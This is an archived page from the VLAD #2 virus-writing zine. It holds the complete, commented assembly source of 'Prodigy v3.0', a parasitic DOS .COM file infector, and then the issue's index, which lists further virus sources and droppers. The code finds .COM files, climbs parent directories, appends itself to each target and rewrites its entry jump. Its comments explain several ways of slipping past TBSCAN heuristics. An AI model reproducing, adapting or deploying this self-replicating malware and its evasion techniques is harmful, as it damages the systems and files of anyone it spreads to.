Virus Labs & Distribution
VLAD #2 - Prodigy 3 Source


; - [Prodigy] v3.0
;   Metabolis/VLAD
;                                _   _  .---------.
;                               | | |_| |  T H E  |
;                               | |  _  `---------'
;    _____   _____   _____   ___| | | |  ______  _   _
;   |  _  | | .-. | |  _  | |  _  | | | |  ___/ | | | |
;   | |_| | | `-' | | |_| | | |_| | | | | |___  | | | |
;   |  ___| |_|~\_\ |_____| |_____| |_|  \_,. | |_|_|_|
;   | |     .---------------------.         | |   | |
;   | |     |  -  VIRUS! v3.0  -  |         | |   | |
;   |_|     `---------------------'         |_|   |_|
;
; - Direct Action, Parasitic .COM infector
; - Restores original attributes and file date/time
; - Searches '..' until there are no more files to infect
; - Won't infect COMMAND.COM
; - Has an infection counter (set to infect 2 at a time right now)
;
; - sure, this virus is simple, and not really worth releasing.. but
;   not everyone is up to understanding Qark's level of code,
;   certainly not me.  So for the people who are just starting off
;   take a look at this one.  It's the 3rd virus I've written, the
;   other 2 definately not worth publishing :) hehe
;
; - Use a86 to compile

        org     0100h                           ; yer COM file starts
                                                ; at this mem address

        db 0e9h,00h,00h                         ; jump to begin

begin:
        call    $+3                             ; get the delta offset
next:   int     3h                              ; (overcomes 'E' heuristic)
        pop     bp                              ; for the virus and
        sub     bp, offset next                 ; stick it in BP

set_dta:

        lea     si, [bp+offset first3]
        mov     di, 100h
        movsw
        movsb

        ; the virus puts the original three bytes of the program back
        ; at 100h so all we have to do at the end of the virus is jump
        ; to 100h and it will execute the infected program as normal

        mov     byte ptr [bp+counter], 00h      ; initialise infection
                                                ; counter
        mov     ah,47h                          ; get current directory
        xor     dl,dl                           ; and put it in currdir
        lea     si,[bp+offset currdir]          ; (dl=0 <- default drive)
        int     21h

        mov     ah,1Ah                          ; Set DTA to buffer
        lea     dx,[bp+offset tempDTA]          ; so command line params
        int     21h                             ; aren't overwritten

find_first:

        mov     ah,4eh                          ; find first file
        mov     cx,7                            ; with any attributes
        dec     byte ptr [bp+offset mask]

        ; the reason I dec the '+' in the filemask is because this
        ; makes it an asterisk.  This will get past scanners picking
        ; up *.COM as a heuristic.

        lea     dx,[bp+offset mask]             ; look for *.COM
        int     21h
        inc     byte ptr [bp+offset mask]

        ; this restores the '*' in the filemask to '+' for writing
        ; back to disk.

        jnc     open_file                       ; no files to infect..
        jmp     load_com

fn:
        jmp     find_next

        ; find_next is too far from most places so I've set this up to
        ; make life easier :) it gets around the jump > 128 error.

open_file:

        ; when a file is found with either find first or find next
        ; all of its details like size, attributes, name etc are stored
        ; in an area called DTA which resides at 80h (just before the
        ; COM itself at 100h).  In this case, the DTA has been moved
        ; to another address.  The different details are positioned
        ; at various positions from 80h.  9eh for instance is the
        ; position of the filename (ASCIIZ)

        cmp     word ptr [bp+tempDTA+1eh],'OC'  ; don't infect command.com
        je      fn                              ; uh oh.. find another file
        lea     dx,[bp+tempDTA+1eh]             ; filename in DTA
        mov     ax,4301h                        ; put normal attributes
        mov     cx,20h                          ; on the file
        int     21h
        jc      fn                              ; error, we outta here
        mov     ax,3D02h                        ; open that file!
        lea     dx,[bp+tempDTA+1eh]             ; filename in DTA
        int     21h
        jc      fn                              ; can't open file :(
        xchg    bx,ax                           ; put file handle in BX

infect:
        mov     cx,3                            ; read 3 bytes from file
        mov     ah,03Fh                         ; and stick them in first3
        lea     dx,[bp+offset first3]
        int     021h

        lea     cx,word ptr [bp+offset first3]  ; put the first 2 bytes of
                                                ; the file in cx
        add     cl,ch                           ; add the two bytes together
        cmp     cl,167                          ; M+Z=167 ?
        je      fn

        ; if I simply compared the first two bytes to 'MZ' (or 'ZM' since
        ; it would be a word) this would set off a tbscan heuristic, so
        ; I've used the adding method, although N+Y=167 it is not really
        ; worth worrying about, I have seen the first two bytes of a COM
        ; file equal 167 yet.

        call    lseek_end                       ; move to the end of the file

        sub     ax,heap-begin+3                 ; subtract the virus length
        cmp     word ptr [bp+first3+1],ax       ; see if jump is to virus
        je      fn                              ; file already infected
        add     ax,heap-begin                   ; add on to know where to
        mov     word ptr [bp+infjump+1],ax      ; jump to and fix it up

        mov     ax,4200h                        ; lseek to beginning of file
        cwd                                     ; xor dx,dx
        xor     cx,cx
        int     21h

        mov     cx,3                            ; write 3 bytes to file
        mov     ah,40h                          ; (the new jump to the
        lea     dx,[bp+offset infjump]          ; virus)
        int     21h

        call    lseek_end                       ; move to the end of the file

        mov     cx,heap-begin                   ; write the virus
        mov     ah,40h                          ; to the end of the
        lea     dx,[bp+offset begin]            ; file
        int     21h

        call    close_file

load_com:

        inc     byte ptr [bp+counter]           ; add one to the counter
        cmp     byte ptr [bp+counter],2         ; check if X files have
        jne     find_next                       ; been infected

        mov     ah, 1Ah                         ; restore DTA to original
        mov     dx, 80h                         ; position
        int     21h

        mov     ah,3bh                          ; Change directory
        lea     dx,[bp+offset slash]            ; to the way it was
        int     21h                             ; before the dot dot

        mov     bx,101h                         ; we need to jump to 100h
        dec     bx                              ; this will knock out a
        jmp     bx                              ; tbscan heuristic :)

find_next:

        call    close_file                      ; make sure file is closed

        mov     ah,4fh                          ; find next file
        int     21h
        jc      dot_dot
        jmp     open_file                       ; infect the bastard!

dot_dot:

        mov     ah,3bh                          ; change directory
        lea     dx,[bp+offset dds]              ; to '..' from the
        int     21h                             ; current directory
        jc      load_com
        jmp     find_first

close_file:

        xor     cx,cx
        mov     cl,byte ptr [bp+tempdta+15h]    ; get old attr from DTA
        lea     dx,[bp+TempDTA+1eh]             ; position of filename in DTA
        mov     ax,4301h                        ; set attr to original
        int     21h
        mov     cx,word ptr [bp+tempDTA+16h]    ; date and time
        mov     dx,word ptr [bp+tempDTA+18h]    ; date and time
        mov     ax,5701h                        ; set file date/time
        int     21h
        mov     ah,3eh                          ; close file
        int     21h
        ret

lseek_end:
        mov     ax,4202h                        ; get to the end
        cwd                                     ; of the file (xor dx,dx)
        xor     cx,cx
        int     21h
        ret

quote   db      0dh,0ah
        db      '[Prodigy] v3.0 by Metabolis/VLAD',0dh,0ah
        db      '"Feel the jungle vibe baby"',0dh,0ah
        db      '"In the jungle, In the jungle.."',0dh,0ah

        ; [Prodigy] v3.0 by Metabolis/VLAD
        ; "Feel the jungle vibe baby"
        ; "In the jungle, In the jungle.."

        ; Quote from "Ruff in the jungle bizness" by the Prodigy :)

infjump db      0e9h,00h,00h                    ; jump to the virus
first3  db      0cdh,20h,00h                    ; First 3 bytes of the
                                                ; com file that was infected
dds     db      '..',00                         ; '..' for dir recursor
mask    db      '+','.COM',00                   ; filemask (for finding files)
slash   db      '\'                             ; fix for currdir

        ; when you use the get current directory function it doesn't
        ; put a '\' at the beginning of it, so it's not possible to
        ; change to the directory if you store it straight away,
        ; that's why I change to directory from offset slash rather
        ; than currdir since it's ASCIIZ.. (string ending in a zero)

heap:

currdir db      64 dup (?)                      ; storage for default dir
counter db      00                              ; infection counter
tempdta db      43 dup (?)

        ; everything after heap doesn't actually get written to disk when
        ; the virus infects a file.

- VLAD #2 INDEX -

ARTICLE.1_1      

Introduction
ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag

ARTICLE.2_1      

The Press
ARTICLE.2_2       Leprechaun Interview
ARTICLE.2_3       Flash Bios
ARTICLE.2_4       AMI Flash Specification
ARTICLE.2_5       Assembly Guide
ARTICLE.2_6       Virus Law
ARTICLE.2_7       Feedback

ARTICLE.3_1      

Mail
ARTICLE.3_2       TSR Tutorial
ARTICLE.3_5       Kennedy Disasm
ARTICLE.3_6       Darth Vader Strain B Disasm
ARTICLE.3_7       Gergana.222 Disasm

ARTICLE.4_1      

Virus Descriptions
ARTICLE.4_2       VLAD Virus Source
ARTICLE.4_3       Republic Source
ARTICLE.4_4       BIOS Meningitis Source
ARTICLE.4_5       Prodigy 3 Source
ARTICLE.4_6       Estonia Source
ARTICLE.4_7       What's Next

ARTICLE.5_1      

About Debug Scripts
ARTICLE.5_2       VLAD Script
ARTICLE.5_3       Republic Script
ARTICLE.5_4       BIOS Meningitis Dropper Script
ARTICLE.5_5       Prodigy 3 Script
ARTICLE.5_6       Estonia Script
ARTICLE.5_7       The End

About VLAD - Links - Contact Us - Main